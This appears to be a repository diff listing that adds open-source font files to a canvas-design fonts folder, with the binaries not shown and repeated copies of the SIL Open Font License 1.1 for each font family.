skills/canvas-design/canvas-fonts/BricolageGrotesque-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/CrimsonPro-Bold.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/CrimsonPro-Italic.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/CrimsonPro-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2018 The Crimson Pro Project Authors (https://github.com/Fonthausen/CrimsonPro)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN
skills/canvas-design/canvas-fonts/CrimsonPro-Regular.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/DMMono-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2020 The DM Mono Project Authors (https://www.github.com/googlefonts/dm-mono)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN
skills/canvas-design/canvas-fonts/DMMono-Regular.ttf
Normal file
Binary file not shown.
94
skills/canvas-design/canvas-fonts/EricaOne-OFL.txt
Normal file
@@ -0,0 +1,94 @@
Copyright (c) 2011 by LatinoType Limitada (luciano@latinotype.com),
with Reserved Font Names "Erica One"

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN	skills/canvas-design/canvas-fonts/EricaOne-Regular.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/GeistMono-Bold.ttf (new file; binary file not shown)
93	skills/canvas-design/canvas-fonts/GeistMono-OFL.txt (new file)
@@ -0,0 +1,93 @@
Copyright 2024 The Geist Project Authors (https://github.com/vercel/geist-font.git)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN	skills/canvas-design/canvas-fonts/GeistMono-Regular.ttf (new file; binary file not shown)
93	skills/canvas-design/canvas-fonts/Gloock-OFL.txt (new file)
@@ -0,0 +1,93 @@
Copyright 2022 The Gloock Project Authors (https://github.com/duartp/gloock)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN	skills/canvas-design/canvas-fonts/Gloock-Regular.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/IBMPlexMono-Bold.ttf (new file; binary file not shown)
93	skills/canvas-design/canvas-fonts/IBMPlexMono-OFL.txt (new file)
@@ -0,0 +1,93 @@
Copyright © 2017 IBM Corp. with Reserved Font Name "Plex"

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN	skills/canvas-design/canvas-fonts/IBMPlexMono-Regular.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/IBMPlexSerif-Bold.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/IBMPlexSerif-BoldItalic.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/IBMPlexSerif-Italic.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/IBMPlexSerif-Regular.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/InstrumentSans-Bold.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/InstrumentSans-BoldItalic.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/InstrumentSans-Italic.ttf (new file; binary file not shown)
93	skills/canvas-design/canvas-fonts/InstrumentSans-OFL.txt (new file)
@@ -0,0 +1,93 @@
Copyright 2022 The Instrument Sans Project Authors (https://github.com/Instrument/instrument-sans)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN	skills/canvas-design/canvas-fonts/InstrumentSans-Regular.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/InstrumentSerif-Italic.ttf (new file; binary file not shown)
BIN	skills/canvas-design/canvas-fonts/InstrumentSerif-Regular.ttf (new file; binary file not shown)
93	skills/canvas-design/canvas-fonts/Italiana-OFL.txt (new file)
@@ -0,0 +1,93 @@
Copyright (c) 2011, Santiago Orozco (hi@typemade.mx), with Reserved Font Name "Italiana".

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/Italiana-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/JetBrainsMono-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/JetBrainsMono-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2020 The JetBrains Mono Project Authors (https://github.com/JetBrains/JetBrainsMono)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org

[SIL Open Font License Version 1.1 text, identical to the copy above]
BIN
skills/canvas-design/canvas-fonts/JetBrainsMono-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Jura-Light.ttf
